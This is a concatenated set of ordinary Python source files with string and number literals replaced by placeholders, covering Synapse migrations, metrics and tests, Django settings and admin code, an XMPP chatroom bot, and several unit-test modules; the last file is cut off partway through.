<s> import logging <EOL> from synapse . storage . prepare_database import get_statements <EOL> import ujson <EOL> logger = logging . getLogger ( __name__ ) <EOL> ALTER_TABLE = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def run_upgrade ( cur , database_engine , * args , ** kwargs ) : <EOL> for statement in get_statements ( ALTER_TABLE . splitlines ( ) ) : <EOL> cur . execute ( statement ) <EOL> cur . execute ( "<STR_LIT>" ) <EOL> rows = cur . fetchall ( ) <EOL> min_stream_id = rows [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> cur . execute ( "<STR_LIT>" ) <EOL> rows = cur . fetchall ( ) <EOL> max_stream_id = rows [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> if min_stream_id is not None and max_stream_id is not None : <EOL> progress = { <EOL> "<STR_LIT>" : min_stream_id , <EOL> "<STR_LIT>" : max_stream_id + <NUM_LIT:1> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> } <EOL> progress_json = ujson . dumps ( progress ) <EOL> sql = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> sql = database_engine . convert_param_style ( sql ) <EOL> cur . execute ( sql , ( "<STR_LIT>" , progress_json ) ) </s>
<s> from synapse . util . logcontext import LoggingContext <EOL> import synapse . metrics <EOL> import logging <EOL> logger = logging . getLogger ( __name__ ) <EOL> metrics = synapse . metrics . get_metrics_for ( __name__ ) <EOL> block_timer = metrics . register_distribution ( <EOL> "<STR_LIT>" , <EOL> labels = [ "<STR_LIT>" ] <EOL> ) <EOL> block_ru_utime = metrics . register_distribution ( <EOL> "<STR_LIT>" , labels = [ "<STR_LIT>" ] <EOL> ) <EOL> block_ru_stime = metrics . register_distribution ( <EOL> "<STR_LIT>" , labels = [ "<STR_LIT>" ] <EOL> ) <EOL> block_db_txn_count = metrics . register_distribution ( <EOL> "<STR_LIT>" , labels = [ "<STR_LIT>" ] <EOL> ) <EOL> block_db_txn_duration = metrics . register_distribution ( <EOL> "<STR_LIT>" , labels = [ "<STR_LIT>" ] <EOL> ) <EOL> class Measure ( object ) : <EOL> __slots__ = [ <EOL> "<STR_LIT>" , "<STR_LIT:name>" , "<STR_LIT>" , "<STR_LIT:start>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" <EOL> ] <EOL> def __init__ ( self , clock , name ) : <EOL> self . clock = clock <EOL> self . name = name <EOL> self . start_context = None <EOL> self . start = None <EOL> def __enter__ ( self ) : <EOL> self . start = self . clock . time_msec ( ) <EOL> self . start_context = LoggingContext . current_context ( ) <EOL> if self . start_context : <EOL> self . ru_utime , self . ru_stime = self . start_context . get_resource_usage ( ) <EOL> self . db_txn_count = self . start_context . db_txn_count <EOL> self . db_txn_duration = self . start_context . db_txn_duration <EOL> def __exit__ ( self , exc_type , exc_val , exc_tb ) : <EOL> if exc_type is not None or not self . start_context : <EOL> return <EOL> duration = self . clock . time_msec ( ) - self . start <EOL> block_timer . inc_by ( duration , self . name ) <EOL> context = LoggingContext . current_context ( ) <EOL> if context != self . start_context : <EOL> logger . warn ( <EOL> "<STR_LIT>" , <EOL> context , self . start_context , self . 
name <EOL> ) <EOL> return <EOL> if not context : <EOL> logger . warn ( "<STR_LIT>" , self . name ) <EOL> return <EOL> ru_utime , ru_stime = context . get_resource_usage ( ) <EOL> block_ru_utime . inc_by ( ru_utime - self . ru_utime , self . name ) <EOL> block_ru_stime . inc_by ( ru_stime - self . ru_stime , self . name ) <EOL> block_db_txn_count . inc_by ( context . db_txn_count - self . db_txn_count , self . name ) <EOL> block_db_txn_duration . inc_by ( <EOL> context . db_txn_duration - self . db_txn_duration , self . name <EOL> ) </s>
<s> from twisted . internet import defer <EOL> from . import V2AlphaRestTestCase <EOL> from synapse . rest . client . v2_alpha import filter <EOL> from synapse . api . errors import StoreError <EOL> class FilterTestCase ( V2AlphaRestTestCase ) : <EOL> USER_ID = "<STR_LIT>" <EOL> TO_REGISTER = [ filter ] <EOL> def make_datastore_mock ( self ) : <EOL> datastore = super ( FilterTestCase , self ) . make_datastore_mock ( ) <EOL> self . _user_filters = { } <EOL> def add_user_filter ( user_localpart , definition ) : <EOL> filters = self . _user_filters . setdefault ( user_localpart , [ ] ) <EOL> filter_id = len ( filters ) <EOL> filters . append ( definition ) <EOL> return defer . succeed ( filter_id ) <EOL> datastore . add_user_filter = add_user_filter <EOL> def get_user_filter ( user_localpart , filter_id ) : <EOL> if user_localpart not in self . _user_filters : <EOL> raise StoreError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> filters = self . _user_filters [ user_localpart ] <EOL> if filter_id >= len ( filters ) : <EOL> raise StoreError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> return defer . succeed ( filters [ filter_id ] ) <EOL> datastore . get_user_filter = get_user_filter <EOL> return datastore <EOL> @ defer . inlineCallbacks <EOL> def test_add_filter ( self ) : <EOL> ( code , response ) = yield self . mock_resource . trigger ( <EOL> "<STR_LIT:POST>" , "<STR_LIT>" % ( self . USER_ID ) , '<STR_LIT>' <EOL> ) <EOL> self . assertEquals ( <NUM_LIT:200> , code ) <EOL> self . assertEquals ( { "<STR_LIT>" : "<STR_LIT:0>" } , response ) <EOL> self . assertIn ( "<STR_LIT>" , self . _user_filters ) <EOL> self . assertEquals ( len ( self . _user_filters [ "<STR_LIT>" ] ) , <NUM_LIT:1> ) <EOL> self . assertEquals ( { "<STR_LIT:type>" : [ "<STR_LIT>" ] } , self . _user_filters [ "<STR_LIT>" ] [ <NUM_LIT:0> ] ) <EOL> @ defer . inlineCallbacks <EOL> def test_get_filter ( self ) : <EOL> self . 
_user_filters [ "<STR_LIT>" ] = [ <EOL> { "<STR_LIT:type>" : [ "<STR_LIT>" ] } <EOL> ] <EOL> ( code , response ) = yield self . mock_resource . trigger_get ( <EOL> "<STR_LIT>" % ( self . USER_ID ) <EOL> ) <EOL> self . assertEquals ( <NUM_LIT:200> , code ) <EOL> self . assertEquals ( { "<STR_LIT:type>" : [ "<STR_LIT>" ] } , response ) <EOL> @ defer . inlineCallbacks <EOL> def test_get_filter_no_id ( self ) : <EOL> self . _user_filters [ "<STR_LIT>" ] = [ <EOL> { "<STR_LIT:type>" : [ "<STR_LIT>" ] } <EOL> ] <EOL> ( code , response ) = yield self . mock_resource . trigger_get ( <EOL> "<STR_LIT>" % ( self . USER_ID ) <EOL> ) <EOL> self . assertEquals ( <NUM_LIT> , code ) <EOL> @ defer . inlineCallbacks <EOL> def test_get_filter_no_user ( self ) : <EOL> ( code , response ) = yield self . mock_resource . trigger_get ( <EOL> "<STR_LIT>" % ( self . USER_ID ) <EOL> ) <EOL> self . assertEquals ( <NUM_LIT> , code ) </s>
<s> import ctypes <EOL> HASH_RING_OK = <NUM_LIT:0> <EOL> HASH_RING_ERR = <NUM_LIT:1> <EOL> HASH_FUNCTION = ctypes . c_uint8 <EOL> HASH_FUNCTION_SHA1 = <NUM_LIT:1> <EOL> HASH_FUNCTION_MD5 = <NUM_LIT:2> <EOL> HASH_RING_DEBUG = <NUM_LIT:1> <EOL> HASH_RING_MODE_NORMAL = <NUM_LIT:1> <EOL> HASH_RING_MODE_LIBMEMCACHED_COMPAT = <NUM_LIT:2> <EOL> HASH_MODE = ctypes . c_uint8 </s>
<s> """<STR_LIT>""" <EOL> __docformat__ = "<STR_LIT>" <EOL> __needs__ = '<STR_LIT>' <EOL> __version__ = "<STR_LIT>" <EOL> __author__ = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> from simpleparse . parser import Parser <EOL> from simpleparse . common import numbers , strings , chartypes <EOL> dec = r"""<STR_LIT>""" <EOL> parser = Parser ( dec , '<STR_LIT>' ) <EOL> entry_parser = Parser ( dec , '<STR_LIT>' ) <EOL> def Parse ( src , processor = None ) : <EOL> '''<STR_LIT>''' <EOL> return parser . parse ( src , processor = processor ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import sys , pprint <EOL> if len ( sys . argv ) > <NUM_LIT:1> : <EOL> src = open ( sys . argv [ <NUM_LIT:1> ] ) . read ( ) <EOL> taglist = Parse ( src ) <EOL> pprint . pprint ( taglist ) </s>
<s> from builtins import str <EOL> import os <EOL> import sys <EOL> try : <EOL> from importlib import import_module <EOL> except ImportError : <EOL> from django . utils . importlib import import_module <EOL> import django <EOL> from . exceptions import InvalidSettingsFactory , SettingsFactoryDoesNotExist <EOL> from . decorators import callable_setting <EOL> from . importers import SettingsImporter <EOL> from . settings import DjangoDefaults , AppSettings , PrefixedSettings <EOL> from . switching import switcher <EOL> from cbsettings . pkgmeta import * <EOL> ENVIRONMENT_VARIABLE = '<STR_LIT>' <EOL> DJANGO_SETTINGS_MODULE = django . conf . ENVIRONMENT_VARIABLE <EOL> def configure ( factory = None , ** kwargs ) : <EOL> if not factory : <EOL> factory = os . environ . get ( ENVIRONMENT_VARIABLE ) <EOL> if not factory : <EOL> raise ImportError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ENVIRONMENT_VARIABLE ) <EOL> if '<STR_LIT:.>' in factory : <EOL> factory_module , factory_name = factory . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> try : <EOL> mod = import_module ( factory_module ) <EOL> factory_obj = getattr ( mod , factory_name ) <EOL> except ( ImportError , AttributeError ) as err : <EOL> raise SettingsFactoryDoesNotExist ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( factory , err ) ) <EOL> settings_obj = factory_obj ( ) <EOL> settings_dict = dict ( ( k , getattr ( settings_obj , k ) ) for k in <EOL> dir ( settings_obj ) if not str ( k ) . startswith ( '<STR_LIT:_>' ) ) <EOL> if '<STR_LIT>' not in settings_dict : <EOL> settings_dict [ '<STR_LIT>' ] = ( <EOL> '<STR_LIT>' % ( factory_module , factory_name ) ) <EOL> sys . meta_path . insert ( <EOL> <NUM_LIT:0> , <EOL> SettingsImporter ( settings_dict [ '<STR_LIT>' ] , settings_dict ) <EOL> ) <EOL> os . environ [ DJANGO_SETTINGS_MODULE ] = settings_dict [ '<STR_LIT>' ] <EOL> return mod , settings_obj <EOL> else : <EOL> raise InvalidSettingsFactory ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % factory ) </s>
<s> from copy import copy <EOL> from hashlib import md5 <EOL> from pickle import MARK , DICT <EOL> try : <EOL> from pickle import _Pickler <EOL> except ImportError : <EOL> from pickle import Pickler as _Pickler <EOL> from . lib import StringIO <EOL> class CanonicalizingPickler ( _Pickler ) : <EOL> dispatch = copy ( _Pickler . dispatch ) <EOL> def save_set ( self , obj ) : <EOL> rv = obj . __reduce_ex__ ( <NUM_LIT:0> ) <EOL> rv = ( rv [ <NUM_LIT:0> ] , ( sorted ( rv [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) , ) , rv [ <NUM_LIT:2> ] ) <EOL> self . save_reduce ( obj = obj , * rv ) <EOL> dispatch [ set ] = save_set <EOL> def save_dict ( self , obj ) : <EOL> write = self . write <EOL> write ( MARK + DICT ) <EOL> self . memoize ( obj ) <EOL> self . _batch_setitems ( sorted ( obj . items ( ) ) ) <EOL> dispatch [ dict ] = save_dict <EOL> def pickle ( obj ) : <EOL> file = StringIO ( ) <EOL> CanonicalizingPickler ( file , <NUM_LIT:0> ) . dump ( obj ) <EOL> return md5 ( file . getvalue ( ) ) . hexdigest ( ) </s>
<s> from nose . tools import assert_false <EOL> from mock import Mock , PropertyMock , patch <EOL> from . models import Photo <EOL> def test_dont_access_source ( ) : <EOL> """<STR_LIT>""" <EOL> pmock = PropertyMock ( ) <EOL> pmock . __get__ = Mock ( ) <EOL> with patch . object ( Photo , '<STR_LIT>' , pmock ) : <EOL> photo = Photo ( ) <EOL> assert_false ( pmock . __get__ . called ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django . contrib import admin <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from . import models <EOL> class ContactAdmin ( admin . ModelAdmin ) : <EOL> fieldsets = ( <EOL> ( None , { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:user>' , '<STR_LIT>' , '<STR_LIT>' ) } ) , <EOL> ( _ ( '<STR_LIT>' ) , { <EOL> '<STR_LIT>' : models . Contact . address_fields ( '<STR_LIT>' ) , <EOL> } ) , <EOL> ( _ ( '<STR_LIT>' ) , { <EOL> '<STR_LIT>' : ( <EOL> [ '<STR_LIT>' ] <EOL> + models . Contact . address_fields ( '<STR_LIT>' ) ) , <EOL> } ) , <EOL> ( _ ( '<STR_LIT>' ) , { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) , <EOL> } ) , <EOL> ) <EOL> list_display = ( <EOL> '<STR_LIT:user>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> list_filter = ( '<STR_LIT>' , ) <EOL> ordering = ( '<STR_LIT>' , ) <EOL> raw_id_fields = ( '<STR_LIT:user>' , ) <EOL> search_fields = ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> + models . Contact . address_fields ( '<STR_LIT>' ) <EOL> + models . Contact . address_fields ( '<STR_LIT>' ) <EOL> ) <EOL> admin . site . register ( models . Contact , ContactAdmin ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django . dispatch import Signal <EOL> contact_created = Signal ( <EOL> providing_args = [ '<STR_LIT:user>' , '<STR_LIT>' , '<STR_LIT:password>' , '<STR_LIT>' ] , <EOL> ) <EOL> order_confirmed = Signal ( <EOL> providing_args = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> ) <EOL> order_paid = Signal ( <EOL> providing_args = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> import xmpp <EOL> import logging <EOL> logger = logging . getLogger ( __name__ ) <EOL> class Chatroom ( object ) : <EOL> """<STR_LIT>""" <EOL> command_patterns = ( ) <EOL> def __init__ ( self , name , params ) : <EOL> self . command_patterns = [ ] <EOL> for pattern in type ( self ) . command_patterns : <EOL> self . command_patterns . append ( ( re . compile ( pattern [ <NUM_LIT:0> ] ) , pattern [ <NUM_LIT:1> ] ) ) <EOL> self . name = name <EOL> self . params = params <EOL> self . jid = xmpp . protocol . JID ( self . params [ '<STR_LIT>' ] ) <EOL> def connect ( self ) : <EOL> """<STR_LIT>""" <EOL> for m in self . params [ '<STR_LIT>' ] : <EOL> m [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> m . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . client = xmpp . Client ( self . jid . getDomain ( ) , debug = [ ] ) <EOL> conn = self . client . connect ( server = self . params [ '<STR_LIT>' ] ) <EOL> if not conn : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> auth = self . client . auth ( self . jid . getNode ( ) , self . params [ '<STR_LIT>' ] ) <EOL> if not auth : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . client . RegisterHandler ( '<STR_LIT:message>' , self . on_message ) <EOL> self . client . RegisterHandler ( '<STR_LIT>' , self . on_presence ) <EOL> self . client . sendInitPresence ( requestRoster = <NUM_LIT:0> ) <EOL> roster = self . client . getRoster ( ) <EOL> for m in self . params [ '<STR_LIT>' ] : <EOL> self . invite_user ( m , roster = roster ) <EOL> def get_member ( self , jid , default = None ) : <EOL> """<STR_LIT>""" <EOL> member = filter ( lambda m : m [ '<STR_LIT>' ] == jid , self . 
params [ '<STR_LIT>' ] ) <EOL> if len ( member ) == <NUM_LIT:1> : <EOL> return member [ <NUM_LIT:0> ] <EOL> elif len ( member ) == <NUM_LIT:0> : <EOL> return default <EOL> else : <EOL> raise Exception ( '<STR_LIT>' % ( jid , ) ) <EOL> def is_member ( self , m ) : <EOL> """<STR_LIT>""" <EOL> if not m : <EOL> return False <EOL> elif isinstance ( m , basestring ) : <EOL> jid = m <EOL> else : <EOL> jid = m [ '<STR_LIT>' ] <EOL> is_member = len ( filter ( lambda m : m [ '<STR_LIT>' ] == jid and m . get ( '<STR_LIT>' ) in ( '<STR_LIT>' , '<STR_LIT>' ) , self . params [ '<STR_LIT>' ] ) ) > <NUM_LIT:0> <EOL> return is_member <EOL> def invite_user ( self , new_member , inviter = None , roster = None ) : <EOL> """<STR_LIT>""" <EOL> roster = roster or self . client . getRoster ( ) <EOL> jid = new_member [ '<STR_LIT>' ] <EOL> logger . info ( '<STR_LIT>' % ( jid , roster . getSubscription ( jid ) ) ) <EOL> if jid in roster . keys ( ) and roster . getSubscription ( jid ) in [ '<STR_LIT>' , '<STR_LIT:to>' ] : <EOL> new_member [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if inviter : <EOL> self . send_message ( '<STR_LIT>' % ( jid , ) , inviter ) <EOL> else : <EOL> new_member [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . broadcast ( '<STR_LIT>' % ( jid , ) ) <EOL> subscribe_presence = xmpp . dispatcher . Presence ( to = jid , typ = '<STR_LIT>' ) <EOL> if '<STR_LIT>' in self . params : <EOL> subscribe_presence . addChild ( name = '<STR_LIT>' , namespace = xmpp . protocol . NS_NICK , payload = self . params [ '<STR_LIT>' ] ) <EOL> self . client . send ( subscribe_presence ) <EOL> if not self . is_member ( new_member ) : <EOL> new_member . setdefault ( '<STR_LIT>' , jid . split ( '<STR_LIT:@>' ) [ <NUM_LIT:0> ] ) <EOL> self . params [ '<STR_LIT>' ] . append ( new_member ) <EOL> def kick_user ( self , jid ) : <EOL> """<STR_LIT>""" <EOL> for member in filter ( lambda m : m [ '<STR_LIT>' ] == jid , self . params [ '<STR_LIT>' ] ) : <EOL> member [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . 
send_message ( '<STR_LIT>' % ( self . name , ) , member ) <EOL> self . client . sendPresence ( jid = member [ '<STR_LIT>' ] , typ = '<STR_LIT>' ) <EOL> self . client . sendPresence ( jid = member [ '<STR_LIT>' ] , typ = '<STR_LIT>' ) <EOL> self . broadcast ( '<STR_LIT>' % ( jid , ) ) <EOL> def send_message ( self , body , to , quiet = False , html_body = None ) : <EOL> """<STR_LIT>""" <EOL> if to . get ( '<STR_LIT>' ) : <EOL> to [ '<STR_LIT>' ] . append ( body ) <EOL> else : <EOL> if not quiet : <EOL> logger . info ( '<STR_LIT>' % ( self . name , to [ '<STR_LIT>' ] , body ) ) <EOL> message = xmpp . protocol . Message ( to = to [ '<STR_LIT>' ] , body = body , typ = '<STR_LIT>' ) <EOL> if html_body : <EOL> html = xmpp . Node ( '<STR_LIT:html>' , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> html . addChild ( node = xmpp . simplexml . XML2Node ( "<STR_LIT>" + html_body . encode ( '<STR_LIT:utf-8>' ) + "<STR_LIT>" ) ) <EOL> message . addChild ( node = html ) <EOL> self . client . send ( message ) <EOL> def broadcast ( self , body , html_body = None , exclude = ( ) ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( '<STR_LIT>' % ( self . name , body , ) ) <EOL> for member in filter ( lambda m : m . get ( '<STR_LIT>' ) == '<STR_LIT>' and m not in exclude , self . params [ '<STR_LIT>' ] ) : <EOL> logger . debug ( member [ '<STR_LIT>' ] ) <EOL> self . send_message ( body , member , html_body = html_body , quiet = True ) <EOL> def do_marco ( self , sender , body , args ) : <EOL> """<STR_LIT>""" <EOL> self . send_message ( '<STR_LIT>' , sender ) <EOL> def do_invite ( self , sender , body , args ) : <EOL> """<STR_LIT>""" <EOL> for invitee in args : <EOL> new_member = { '<STR_LIT>' : invitee } <EOL> self . invite_user ( new_member , inviter = sender ) <EOL> def do_kick ( self , sender , body , args ) : <EOL> """<STR_LIT>""" <EOL> if sender . get ( '<STR_LIT>' ) != True : return <EOL> for user in args : <EOL> self . 
kick_user ( user ) <EOL> def do_mute ( self , sender , body , args ) : <EOL> """<STR_LIT>""" <EOL> if sender . get ( '<STR_LIT>' ) : <EOL> self . send_message ( '<STR_LIT>' , sender ) <EOL> else : <EOL> self . broadcast ( '<STR_LIT>' % ( sender [ '<STR_LIT>' ] , ) ) <EOL> sender [ '<STR_LIT>' ] = [ ] <EOL> sender [ '<STR_LIT>' ] = True <EOL> def do_unmute ( self , sender , body , args ) : <EOL> """<STR_LIT>""" <EOL> if sender . get ( '<STR_LIT>' ) : <EOL> sender [ '<STR_LIT>' ] = False <EOL> self . broadcast ( '<STR_LIT>' % ( sender [ '<STR_LIT>' ] , ) ) <EOL> for msg in sender . get ( '<STR_LIT>' , [ ] ) : <EOL> self . send_message ( msg , sender ) <EOL> sender [ '<STR_LIT>' ] = [ ] <EOL> else : <EOL> self . send_message ( '<STR_LIT>' , sender ) <EOL> def on_disconnect ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . error ( '<STR_LIT>' ) <EOL> def on_presence ( self , session , presence ) : <EOL> """<STR_LIT>""" <EOL> from_jid = presence . getFrom ( ) <EOL> is_member = self . is_member ( from_jid . getStripped ( ) ) <EOL> if is_member : <EOL> member = self . get_member ( from_jid . getStripped ( ) ) <EOL> else : <EOL> member = None <EOL> logger . info ( '<STR_LIT>' % ( from_jid , is_member , presence . getType ( ) ) ) <EOL> if presence . getType ( ) == '<STR_LIT>' : <EOL> if is_member : <EOL> logger . info ( '<STR_LIT>' % ( from_jid , ) ) <EOL> member [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> else : <EOL> pass <EOL> elif presence . getType ( ) == '<STR_LIT>' : <EOL> if is_member : <EOL> logger . info ( '<STR_LIT>' % ( from_jid , ) ) <EOL> self . client . sendPresence ( jid = from_jid , typ = '<STR_LIT>' ) <EOL> member [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . broadcast ( '<STR_LIT>' % ( from_jid , ) ) <EOL> else : <EOL> pass <EOL> elif presence . getType ( ) == None : <EOL> if is_member : <EOL> member [ '<STR_LIT>' ] += <NUM_LIT:1> <EOL> elif presence . 
getType ( ) == '<STR_LIT>' : <EOL> if is_member : <EOL> member [ '<STR_LIT>' ] -= <NUM_LIT:1> <EOL> else : <EOL> logger . info ( '<STR_LIT>' % ( presence . getType ( ) , from_jid ) ) <EOL> def on_message ( self , con , event ) : <EOL> """<STR_LIT>""" <EOL> msg_type = event . getType ( ) <EOL> nick = event . getFrom ( ) . getResource ( ) <EOL> from_jid = event . getFrom ( ) . getStripped ( ) <EOL> body = event . getBody ( ) <EOL> if msg_type == '<STR_LIT>' and body is None : <EOL> return <EOL> logger . debug ( '<STR_LIT>' % ( msg_type , from_jid , nick , body , ) ) <EOL> sender = filter ( lambda m : m [ '<STR_LIT>' ] == from_jid , self . params [ '<STR_LIT>' ] ) <EOL> should_process = msg_type in [ '<STR_LIT:message>' , '<STR_LIT>' , None ] and body is not None and len ( sender ) == <NUM_LIT:1> <EOL> if not should_process : return <EOL> sender = sender [ <NUM_LIT:0> ] <EOL> try : <EOL> for p in self . command_patterns : <EOL> reg , cmd = p <EOL> m = reg . match ( body ) <EOL> if m : <EOL> logger . info ( '<STR_LIT>' % ( cmd , ) ) <EOL> function = getattr ( self , str ( cmd ) , None ) <EOL> if function : <EOL> return function ( sender , body , m ) <EOL> words = body . split ( '<STR_LIT:U+0020>' ) <EOL> cmd , args = words [ <NUM_LIT:0> ] , words [ <NUM_LIT:1> : ] <EOL> if cmd and cmd [ <NUM_LIT:0> ] == '<STR_LIT:/>' : <EOL> cmd = cmd [ <NUM_LIT:1> : ] <EOL> command_handler = getattr ( self , '<STR_LIT>' + cmd , None ) <EOL> if command_handler : <EOL> return command_handler ( sender , body , args ) <EOL> broadcast_body = '<STR_LIT>' % ( sender [ '<STR_LIT>' ] , body , ) <EOL> return self . broadcast ( broadcast_body , exclude = ( sender , ) ) <EOL> except : <EOL> logger . exception ( '<STR_LIT>' % ( body , sender [ '<STR_LIT>' ] ) ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import os <EOL> import unittest <EOL> import chumpy as ch <EOL> from chumpy import Ch <EOL> import numpy as np <EOL> from util_tests import get_earthmesh <EOL> class TestGeometry ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> np . random . seed ( <NUM_LIT:0> ) <EOL> def test_rodrigues ( self ) : <EOL> from geometry import Rodrigues <EOL> rt = np . random . randn ( <NUM_LIT:3> ) <EOL> rt2 = rt + np . random . rand ( <NUM_LIT:3> ) * <NUM_LIT> <EOL> foo1 = Rodrigues ( rt = rt ) <EOL> foo2 = Rodrigues ( rt = rt2 ) <EOL> empirical = ( foo2 . r - foo1 . r ) . flatten ( ) <EOL> predicted = foo1 . dr_wrt ( foo1 . rt ) . dot ( rt2 - rt ) <EOL> self . assertTrue ( np . max ( np . abs ( empirical - predicted ) ) < <NUM_LIT> ) <EOL> def test_vert_normals ( self ) : <EOL> from geometry import VertNormals <EOL> import numpy as np <EOL> mesh = get_earthmesh ( np . zeros ( <NUM_LIT:3> ) , np . zeros ( <NUM_LIT:3> ) ) <EOL> v , f = mesh . v * <NUM_LIT> , mesh . f <EOL> vn1 = VertNormals ( f = f , v = v ) <EOL> dr_predicted = vn1 . dr_wrt ( vn1 . v ) . copy ( ) <EOL> eps = <NUM_LIT> * np . random . randn ( v . size ) . reshape ( v . shape ) <EOL> v += eps <EOL> vn2 = VertNormals ( v = v , f = f ) <EOL> empirical_diff = ( vn2 . r - vn1 . r ) . reshape ( ( - <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> predicted_diff = dr_predicted . dot ( eps . flatten ( ) ) . reshape ( ( - <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> if False : <EOL> print np . max ( np . abs ( empirical_diff - predicted_diff ) ) <EOL> print empirical_diff [ : <NUM_LIT:6> ] <EOL> print predicted_diff [ : <NUM_LIT:6> ] <EOL> self . assertTrue ( np . max ( np . abs ( empirical_diff - predicted_diff ) ) < <NUM_LIT> ) <EOL> suite = unittest . TestLoader ( ) . loadTestsFromTestCase ( TestGeometry ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from . base import BaseTestCase <EOL> from . models import EmailUser <EOL> from django . forms import ValidationError <EOL> from sudo . forms import SudoForm <EOL> class SudoFormTestCase ( BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( SudoFormTestCase , self ) . setUp ( ) <EOL> self . login ( ) <EOL> def test_integration_empty ( self ) : <EOL> self . assertFalse ( SudoForm ( self . user ) . is_valid ( ) ) <EOL> def test_integration_invalid_password ( self ) : <EOL> self . assertFalse ( <EOL> SudoForm ( self . user , { '<STR_LIT:password>' : '<STR_LIT>' } ) . is_valid ( ) <EOL> ) <EOL> def test_integration_valid_password ( self ) : <EOL> self . assertTrue ( <EOL> SudoForm ( self . user , { '<STR_LIT:password>' : '<STR_LIT:foo>' } ) . is_valid ( ) <EOL> ) <EOL> def test_integration_secondary_auth_valid_password ( self ) : <EOL> self . assertTrue ( <EOL> SudoForm ( self . user , { '<STR_LIT:password>' : '<STR_LIT>' } ) . is_valid ( ) <EOL> ) <EOL> def test_clean_password_invalid_password ( self ) : <EOL> with self . assertRaises ( ValidationError ) : <EOL> SudoForm ( self . user , { '<STR_LIT:password>' : '<STR_LIT>' } ) . clean_password ( ) <EOL> def test_clean_password_valid_password ( self ) : <EOL> password = '<STR_LIT:foo>' <EOL> self . assertEqual ( <EOL> SudoForm ( self . user , { '<STR_LIT:password>' : password } ) . clean_password ( ) , <EOL> password <EOL> ) <EOL> def test_clean_password_secondary_auth_valid_password ( self ) : <EOL> password = '<STR_LIT>' <EOL> self . assertEqual ( <EOL> SudoForm ( self . user , { '<STR_LIT:password>' : password } ) . clean_password ( ) , <EOL> password <EOL> ) <EOL> def test_integration_custom_user ( self ) : <EOL> self . login ( EmailUser ) <EOL> self . assertTrue ( <EOL> SudoForm ( self . user , { '<STR_LIT:password>' : '<STR_LIT:foo>' } ) . is_valid ( ) <EOL> ) </s>
<s> try : <EOL> import unittest2 as unittest <EOL> except ImportError : <EOL> import unittest <EOL> from sourcemap . objects import Token , SourceMapIndex <EOL> class TokenTestCase ( unittest . TestCase ) : <EOL> def test_eq ( self ) : <EOL> assert Token ( <NUM_LIT:1> , <NUM_LIT:1> , '<STR_LIT>' , <NUM_LIT:1> , <NUM_LIT:1> , '<STR_LIT>' ) == Token ( <NUM_LIT:1> , <NUM_LIT:1> , '<STR_LIT>' , <NUM_LIT:1> , <NUM_LIT:1> , '<STR_LIT>' ) <EOL> assert Token ( <NUM_LIT> , <NUM_LIT:1> , '<STR_LIT>' , <NUM_LIT:1> , <NUM_LIT:1> , '<STR_LIT>' ) != Token ( <NUM_LIT:1> , <NUM_LIT:1> , '<STR_LIT>' , <NUM_LIT:1> , <NUM_LIT:1> , '<STR_LIT>' ) <EOL> class SourceMapIndexTestCase ( unittest . TestCase ) : <EOL> def get_index ( self ) : <EOL> tokens = [ <EOL> Token ( dst_line = <NUM_LIT:0> , dst_col = <NUM_LIT:0> ) , <EOL> Token ( dst_line = <NUM_LIT:0> , dst_col = <NUM_LIT:5> ) , <EOL> Token ( dst_line = <NUM_LIT:1> , dst_col = <NUM_LIT:0> ) , <EOL> Token ( dst_line = <NUM_LIT:1> , dst_col = <NUM_LIT:12> ) , <EOL> ] <EOL> rows = [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:5> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:12> ] , <EOL> ] <EOL> index = { <EOL> ( <NUM_LIT:0> , <NUM_LIT:0> ) : tokens [ <NUM_LIT:0> ] , <EOL> ( <NUM_LIT:0> , <NUM_LIT:5> ) : tokens [ <NUM_LIT:1> ] , <EOL> ( <NUM_LIT:1> , <NUM_LIT:0> ) : tokens [ 